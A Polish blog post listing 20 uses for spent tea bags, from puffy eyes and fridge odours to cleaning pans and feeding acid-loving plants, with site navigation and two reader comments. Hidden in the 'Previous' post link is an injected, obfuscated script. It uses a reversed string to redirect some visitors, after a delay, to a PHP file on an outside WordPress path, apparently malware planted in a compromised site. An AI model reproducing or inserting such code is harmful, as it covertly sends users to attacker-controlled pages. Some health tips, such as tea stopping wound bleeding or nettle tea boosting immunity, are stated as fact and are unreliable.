20 zaskakujących zastosowań dla rzeczy, którą codziennie wyrzucasz do kosza.


To nie do wiary, że rzecz, którą zwykle wyrzucasz po jednym, czasami dwóch użyciach, może przydać się jeszcze na wiele sposobów! Nieważne, czy wolisz sypaną czy w torebce. Na pewno uznajesz wykorzystaną herbatę za śmieci i pozbywasz się jej, niewiele sobie myśląc. Następnym razem, gdy miseczka na zużyte torebki zapełni się do granic możliwości, potraktuj to, jak głos z niebios. Bo z tymi torebkami można jeszcze wiele zrobić!

Zastosowań dla zużytej herbaty jest bardzo wiele. Ja wybrałam 20 najciekawszych przykładów, przydatnych w codziennym życiu. Pisząc o herbacie, mam na myśli czarną, chyba że wyraźnie zaznaczę, że chodzi o zieloną czy inną ziołową. A zatem, oto lista 🙂

#1 Spuchnięte, podkrążone oczy? Usiądź wygodnie, zamknij oczy i na 10-15 minut połóż na nich mokre torebki z herbatą. A potem spójrz w lustro 🙂

#2 Umieść kilka torebek w miseczce i wstaw do lodówki. Pochłoną wszelkie zapachy.

#3 Wrzuć kilka torebek do miski i nalej ciepłej wody. Mocz w niej stopy przez 20 minut a zobaczysz, że pozbędziesz się … nie zawsze przyjemnego zapachu.

#4 Za dużo czasu spędzonego na słońcu? Połóż na oparzenia chłodne torebki a jeśli masz spieczone całe ciało, wrzuć kilka/kilkanaście torebek do wanny i wskakuj.

#5 Wrzuć kilka torebek do gotującego się ryżu. To nada mu ciekawy, herbaciany posmak.

#6 Połóż torebkę na miejsce ukąszenia owada – pomoże to na opuchliznę i swędzenie.

#7 Rozerwij 1-2 torebki i wetrzyj zawartość w dłonie. To usunie zapachy, np. ryby albo cebuli.

#8 Umieść kilkanaście suchych torebek w bawełnianym woreczku i zawieś w pomieszczeniu. Herbata wchłonie wilgoć i zredukuje wilgotność powietrza.

#9 W przypadku niegroźnego skaleczenia, umieść torebkę w miejscu rany. Taniny obecne w herbacie zmniejszą krwawienie.

#10 Pryszcz wyskoczył nie w porę? Połóż na nim ciepłą torebkę czarnej lub zielonej herbaty i trzymaj przez 10 minut. Wspomniane taniny zredukują opuchliznę i zaczerwienienie. Dodatkowo, na problematyczną cerę może pomóc przemywanie twarzy naparem z zielonej herbaty.

#11 Naturalny płyn do płukania ust. Ponownie zaparz kilka torebek herbaty miętowej w litrze wody. Odświeża oddech równie skutecznie, jak jego sklepowi bracia.

#12 Zalej około 6 torebek herbaty rumiankowej litrem wody a otrzymasz płukankę do włosów, która lekko rozjaśni i podkreśli refleksy we włosach. Taką miksturą polej włosy po umyciu.

#13 Herbata z pokrzywy zawiera dużo wapnia, magnezu i żelaza, dlatego warto pić ją codziennie. Wystarczy zaparzyć kilka torebek w litrze wody i wstawić na kilka godzin (a najlepiej na całą noc) do lodówki. Naturalny sposób na wzmocnienie układu odpornościowego.

#14 Nieco zużyte już buty z ciemnej, brązowej skóry można łatwo odświeżyć. Przetrzyj je okrężnymi ruchami wilgotną torebką herbaty.

#15 Zalej ciepłą wodą tłuste, brudne garnki, patelnie czy żaroodporne naczynia i wrzuć do nich kilka torebek z herbatą. Przez noc taniny powinny poradzić sobie z zeschniętymi zabrudzeniami.

#16 Napar z herbaty świetnie nadaje się do czyszczenia luster i szyb. Najpierw trzeba przemyć powierzchnie przygotowanym płynem a potem osuszyć czystą szmatką.

#17 Pozbądź się nieprzyjemnych zapachów z dywanu czy też z legowiska ukochanego psiaka. Wysuszoną herbatę z zużytych torebek posyp na wybraną powierzchnię, poczekaj 10 minut i odkurz.

#18 Z bólem zęba to trzeba jechać do dentysty, ale w międzyczasie można sobie ulżyć. Zalej torebkę herbaty ciepłą wodą, wyjmij z niej zawartość, zawiń w niewielki kawałek czystej szmatki i zastosuj jako kompres.

#19 Zanim zabierzesz się za uprzątnięcie kominka, posyp resztki spalonego drewna i popiół wilgotną herbatą z torebki. Dzięki temu podczas sprzątania kurz i popiół nie będą tak unosić się w powietrzu.

#20 Jeśli rośliny w twoim ogrodzie lubią kwaśne podłoże, możesz podsypać je właśnie herbatą. Powinny pięknie prezentować się i kwitnąć.

To moim zdaniem najciekawsza 20-stka. Jeśli znacie jeszcze inne przydatne zastosowania herbaty – piszcie w komentarzu!

(zdjęcie: evoke.ie)

 

Previous Kochanie, <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to nie tak jak myślisz, czyli cała prawda o krwistym jajku.
Next Neutralny pokój dziecka - kolory, meble i dodatki.

Suggested Posts

Liebster Blog Award

Drugi miesiąc Niny.

DIY: Wielkanocne jajka ze sznurka.

Rzecz, której nigdy tej pielęgniarce nie zapomnę.

W Halloween każdy widzi swoje potwory.

DIY: Wiosenne projekty dla dzieci.

2 komentarze

  1. 27 lutego 2017
    Odpowiedz

    Genialne! Nie wiedziałam że można tyle rzeczy zrobić z czegoś co wyrzucam codziennie! 🙂 wykorzystam na te oczy 🙂 i ciekawi mnie pkt 12

  2. 27 lutego 2017
    Odpowiedz

    większość znam, ale kilka nowych pomysłów zapamiętam 😉

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *